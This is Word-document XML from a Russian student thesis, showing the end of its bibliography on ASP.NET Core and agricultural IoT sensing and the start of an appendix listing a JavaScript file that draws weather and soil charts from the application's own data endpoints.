        <w:t>Aydin S., Aydin M. N. Ontology-based data acquisition model development for agricultural open data platforms and implementation of OWL2MVC tool //Computers and Electronics in Agriculture. – 2020. – Т. 175. – С. 105589.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C89442" w14:textId="587EBFCC" w:rsidR="00674F9F" w:rsidRDefault="00674F9F" w:rsidP="00674F9F">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Price M. J. C# 10 and. NET 6–Modern Cross-Platform Development: Build apps, websites, and services with ASP. NET Core 6, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blazor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and EF Core 6 using Visual Studio 2022 and Visual Studio Code. – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Packt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00674F9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Publishing Ltd, 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1190CF8D" w14:textId="3F665135" w:rsidR="00674F9F" w:rsidRDefault="004D3E4B" w:rsidP="004D3E4B">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D3E4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ciliberti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D3E4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> J., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D3E4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ciliberti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D3E4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> J. Getting the Most from the New Features in ASP. NET Core MVC //ASP. NET Core Recipes: A Problem-Solution Approach. – 2017. – С. 139-170.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5346249C" w14:textId="478E98B3" w:rsidR="004D3E4B" w:rsidRDefault="004D3E4B" w:rsidP="004D3E4B">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r w:rsidRPr="004D3E4B">
        <w:t>Грибова В. В. и др. Создание жизнеспособных интеллектуальных систем с</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D3E4B">
        <w:t>управляемыми декларативными компонентами //Информационные и математические</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D3E4B">
        <w:t>технологии в науке и управлении. – 2018. – №. 3 (11). – С. 6-17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4484F87F" w14:textId="0DFACF2E" w:rsidR="00AA5706" w:rsidRPr="00E258B2" w:rsidRDefault="00AA5706" w:rsidP="004D3E4B">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APEXCHARTS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Charts</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t>: [</w:t>
      </w:r>
      <w:r>
        <w:t>сайт</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve">]. – </w:t>
      </w:r>
      <w:r>
        <w:t>США</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve">, 2024. – </w:t>
      </w:r>
      <w:r>
        <w:t>Текст</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>электронный</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5706">
        <w:t xml:space="preserve">: https://apexcharts.com/. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>дата обращения: 17.03.2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB8B6AB" w14:textId="037E6AF4" w:rsidR="00E258B2" w:rsidRDefault="00E258B2" w:rsidP="00E258B2">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>Савин И.Ю., Блохин Ю.И. ОБ ОПТИМИЗАЦИИ РАЗМЕЩЕНИЯ СЕТИ ДАТЧИКОВ ИНТЕРНЕТА ВЕЩЕЙ НА ПАХОТНЫХ УГОДЬЯХ / Бюллетень Почвенного института им. В.В. Докучаева. 2022. № 110. С.22-50.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DD523A" w14:textId="77777777" w:rsidR="00C7756E" w:rsidRDefault="00C7756E" w:rsidP="00C7756E">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>Методология БЭМ</w:t>
      </w:r>
      <w:r w:rsidRPr="00547D19">
        <w:t>: [</w:t>
      </w:r>
      <w:r>
        <w:t>сайт</w:t>
      </w:r>
      <w:r w:rsidRPr="00547D19">
        <w:t xml:space="preserve">]. – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Санкт-Петербург, 2023. – Текст: электронный. – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00547D19">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="004E3DA9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="00C45690">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3DA9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C45690">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E3DA9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C45690">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004E3DA9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidRPr="00C45690">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="004E3DA9">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>methodology</w:t>
      </w:r>
      <w:r w:rsidRPr="00C45690">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00547D19">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007429B9">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>дата обращения: 17.03.2024</w:t>
      </w:r>
      <w:r w:rsidRPr="007429B9">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699FEB70" w14:textId="77777777" w:rsidR="00C7756E" w:rsidRDefault="00C7756E" w:rsidP="00C7756E">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r w:rsidRPr="004E3DA9">
        <w:t>Фримен А. ASP.NET Core MVC с примерами на C# для профессионалов / Диалектика, 2017. – 992с.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190EB441" w14:textId="1CFF289E" w:rsidR="0093378B" w:rsidRPr="00C7756E" w:rsidRDefault="0093378B" w:rsidP="009F5142">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="426"/>
        </w:tabs>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="426" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Доспехов Б.А. Методика полевого опыта / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Агропромиздат</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, 1985. – 351с.</w:t>
      </w:r>
      <w:r w:rsidRPr="007429B9">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EABAFF" w14:textId="5B7E22DD" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc161568223"/>
      <w:bookmarkStart w:id="54" w:name="_Toc162709248"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ПРИЛОЖЕНИЕ </w:t>
      </w:r>
      <w:r w:rsidR="00CC2EBA">
        <w:t>А</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (листинг файла </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>indexcharts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B549DB">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="0614A45A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>$(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F1D0C2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">    var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartTwind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E287EE" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">    var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartPwind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08858D0E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">    var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartTpov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06811287" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">    var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>charWindSpeed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B0809D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">    var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>calendarButton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>document.querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>(".main-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>header__calendar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E42CA06" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>renderChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = function (type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534D0A7E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>actionStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D985419" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>seriesName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DF1221" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartClass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C76E07" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        switch (type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D4EDEA"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37B80F16"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wind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B279A1B"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t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>воздуха</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294FD2DB"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twind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7658D540" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F9F335"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37F414F1"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Rh";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D42F7A"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p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>воздуха</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2E3190"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pwind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23303DC7" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBEB451"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0B1843AC"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pov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE8D276"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t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>поверхности</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>почвы</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADEBC74"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tpov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF081D6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB1C475"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34CAB4EA"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ind";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8B4AF3"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>скорость</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ветра</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC7333A"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precipitation");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0527F0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DA0360" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C01D8A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>$.ajax</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093A22A9" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            type: "GET",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165053B0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            url: "/Home/Get" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>actionStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> + "Data1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A73372" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            data: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036D7236" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                date: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>calendarButton.value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18C33445" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
    </w:p>
